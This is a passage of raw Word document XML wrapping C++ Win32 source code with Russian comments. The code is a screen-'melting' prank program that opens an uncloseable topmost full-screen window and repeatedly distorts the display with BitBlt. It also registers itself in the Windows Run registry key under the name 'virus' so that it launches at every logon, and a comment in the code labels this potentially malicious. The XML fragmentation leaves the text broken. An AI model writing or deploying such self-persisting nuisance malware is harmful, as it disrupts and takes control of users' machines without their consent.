        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>wParam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== 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAE347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{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Таймер для эффекта плавления</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE1287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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HDC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Window = GetDC(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hWnd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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09A8ED" w14:textId="435A0C09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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int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X = ( rand() % ScreenWidth - 20 ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA24471" w14:textId="68709D93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      </w:t>
      </w:r>
      <w:r w:rsidR="00AF20F4" w:rsidRPr="003B072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Y = ( rand() % 15 ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2893AC" w14:textId="186EA9B1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     </w:t>
      </w:r>
      <w:r w:rsidR="00AF20F4" w:rsidRPr="003B072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Width = ( rand() % 20 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B5E12F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   BitBlt(Window, X, Y, Width, ScreenHeight, Window, X, 0,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SRCCOPY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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468CAEA7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   ReleaseDC(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hWnd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, Window);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1509C6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2824A0E3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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>else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00FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if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(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wParam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== 2) { PostQuitMessage(0); } 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//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Отправляем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сообщение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WM_QUIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203CE189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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>break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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4F9AB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AF81B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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>case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WM_DESTROY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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDCD542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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEE40AF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KillTimer(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hWnd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, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E344F38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>KillTimer(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>hWnd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>, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CFE26D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break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>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E2339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Возвращаем 0, если сообщение не обработано</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0A215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return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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ACF192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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BC6374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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744024D1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Если сообщение не обработанно в switch - передаем его в стандартную обработку окон</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD1514C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00FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return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DefWindowProc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(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hWnd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Msg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wParam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lParam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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828B5B1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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCEFC0E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4BA853C4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8000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>// Функция проверки, зарегистрирована ли программа для автоматического запуска</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A26644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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>BOOL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IsMyProgramRegisteredForStartup(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>PCWSTR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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>pszAppName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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839ECEF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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4143697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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>HKEY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hKey = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>NULL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;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Дескриптор ключа реестра. Инициализируется NULL для безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5230B4A5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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>LONG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lResult = 0;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Результат операций с реестром.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318EF84E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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>BOOL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fSuccess = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>TRUE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;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Флаг успешного выполнения. Инициализируется TRUE, затем может быть изменен на FALSE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8A46C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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>DWORD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dwRegType = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>REG_SZ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;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Ожидаемый тип значения реестра (REG_SZ для строки).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1628A625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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  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wchar_t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szPathToExe[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>MAX_PATH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] = {};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Буфер для хранения пути к исполняемому файлу. Инициализируется пустой строкой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307A83ED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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>DWORD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dwSize =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sizeof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(szPathToExe);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Размер буфера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6723F48F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696A0D81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2494FBDC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Открытие ключа реестра для программ автозапуска. KEY_READ разрешает только чтение из ключа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028EF347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lResult = RegOpenKeyExW(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HKEY_CURRENT_USER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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"Software\\Microsoft\\Windows\\CurrentVersion\\Run"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0,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KEY_READ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, &amp;hKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4117A1CA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</w:p>
    <w:p w14:paraId="42A6A8AA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Проверка успешного открытия ключа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA149EB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fSuccess = ( lResult == 0 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D6CC6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1E62CECF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Если ключ был успешно открыт...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA49DBC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if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(fSuccess)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79441A86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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BA6FBB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Попытка получить значение, связанное с именем приложения. RRF_RT_REG_SZ указывает, что ожидается значение REG_SZ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D25E3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lResult = RegGetValueW(hKey,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NULL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pszAppName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RRF_RT_REG_SZ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, &amp;dwRegType, szPathToExe, &amp;dwSize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73833DD8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Проверка успешного получения значения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE87325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fSuccess = ( lResult == 0 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9606AA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A98C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0A12D44C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Если значение было успешно получено, проверка на пустоту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F671339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00FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if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(fSuccess) { fSuccess = ( wcslen(szPathToExe) &gt; 0 ); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00591A3F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</w:p>
    <w:p w14:paraId="7550A0A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Закрытие ключа реестра, если он был открыт. Важно для освобождения ресурсов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F0DBE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if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(hKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752EFE5F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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1863D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RegCloseKey(hKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E7923A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hKey = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>NULL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;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Установка в NULL для предотвращения случайного повторного использования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E17A29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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F184E7D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3287D1DA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Возвращение флага успешного выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A53C4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return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fSuccess;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC4931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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A509F1E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51F4EBDC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8000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>// Функция регистрации программы для автоматического запуска</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0925F9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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BOOL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RegisterMyProgramForStartup(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PCWSTR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pszAppName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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PCWSTR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pathToExe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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46028D22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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED3CB9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKEY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hKey =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NULL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; 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//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Дескриптор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ключа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реестра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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F6A36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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>LONG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lResult = 0;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Результат операций с реестром.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDA6DC3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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>BOOL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fSuccess = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>TRUE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;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Флаг успешного выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB1AB02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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>DWORD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dwSize;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Размер данных значения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFA250B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006C157B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Расчет максимального размера строки значения. Учитывает pathToExe, args и кавычки. Должен быть достаточно большим.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D80B42C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const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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>size_t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count = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>MAX_PATH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* 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8CE76E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wchar_t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szValue[count] = {};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Буфер для хранения значения, которое будет записано в реестр.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01975E67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270D371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410629A5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lastRenderedPageBreak/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Формирование строки значения: кавычки вокруг пути, пробел, затем аргументы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24787333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wcscpy_s(szValue, count, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"\""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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE83C0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wcscat_s(szValue, count, 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pathToExe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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5752A8FC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wcscat_s(szValue, count, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"\" "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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1929B559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</w:p>
    <w:p w14:paraId="701EDD16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Создание ключа реестра для программ автозапуска. KEY_WRITE и KEY_READ разрешают чтение и запись.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B14995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lResult = RegCreateKeyExW(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HKEY_CURRENT_USER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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"Software\\Microsoft\\Windows\\CurrentVersion\\Run"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0,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NULL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0, (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KEY_WRITE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|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KEY_READ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),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NULL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&amp;hKey,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NULL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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104A89E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</w:p>
    <w:p w14:paraId="16981AF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>fSuccess = ( lResult == 0 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E2461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24D68A1C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Если ключ был успешно создан...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D2B16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if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(fSuccess)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEADFCE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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7698C27E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Установка значения в реестре.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A41C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dwSize = ( wcslen(szValue) + 1 ) *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sizeof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>(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wchar_t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);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//Правильное вычисление размера в байтах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506944D5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lResult = RegSetValueExW(hKey, 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pszAppName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0,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REG_SZ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, (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BYTE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*)szValue, dwSize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7182704C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>fSuccess = ( lResult == 0 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B1A68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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED0D8EF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7D1EF16F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Закрытие ключа реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27211A66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00FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if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(hKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE8443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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E24C393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RegCloseKey(hKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536FB1F2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hKey =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NULL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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A7F0E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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B93CBD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6D5BF3DA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Возвращение флага успешного выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA6E03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return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fSuccess;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF38427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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821A99A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1E746631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8000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>// Функция регистрации текущей программы для автозапуска.  Потенциально вредоносная!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72813931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FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>void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RegisterProgram( )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627C135F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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D00060B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wchar_t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szPathToExe[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>MAX_PATH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>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F4A85E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08EBE5DC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Получение пути к исполняемому файлу текущей программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDDD5E1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GetModuleFileNameW(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NULL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szPathToExe,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MAX_PATH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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4562F1FA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Регистрация программы для автозапуска под именем "virus".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9EA78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RegisterMyProgramForStartup(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"virus"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, szPathToExe);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4F7F4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443916F2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</w:p>
    <w:p w14:paraId="5D320A71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FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int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main(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HINSTANCE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Inst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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C78AA8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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F47AA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RegisterProgram( );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D2F88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IsMyProgramRegisteredForStartup(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"virus"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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E5481A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//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Получаем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ширину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и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высоту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экрана</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0BE329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ScreenWidth = GetSystemMetrics(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SM_CXSCREEN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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1216944F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ScreenHeight = GetSystemMetrics(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SM_CYSCREEN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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07444A48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</w:p>
    <w:p w14:paraId="61E26CBE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lastRenderedPageBreak/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//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Создаем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структуру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,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описывающую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класс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окна</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672A4E4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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WNDCLASS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wndClass = {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CS_NOCLOSE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Melter, 0, 0, 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Inst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0, LoadCursorW(0,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IDC_ARROW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), 0, 0, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"ScreenMelter"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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C9FF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</w:p>
    <w:p w14:paraId="46007D4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//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Регистрируем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класс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окна</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD1C988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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if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(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RegisterClass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(&amp;wndClass))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D329B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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FB5A19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//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Создаем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окно</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "ScreenMelter"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBC393D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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HWND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hWnd = CreateWindowExA(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WS_EX_TOPMOST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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"ScreenMelter"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0,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WS_POPUP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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ECAFEE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0, 0, ScreenWidth, ScreenHeight,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HWND_DESKTOP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, 0, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inst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, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D25FDF9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</w:p>
    <w:p w14:paraId="458D225C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Проверяем, что окно было успешно создано</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526BF94A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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>if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(hWnd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13476BDE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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3601F146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Инициализируем генератор случайных чисел</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0391EB2B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srand(GetTickCount( ));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF770D8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22B0C5FE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Объявляем структуру для хранения сообщений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A86B99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2B91AF"/>
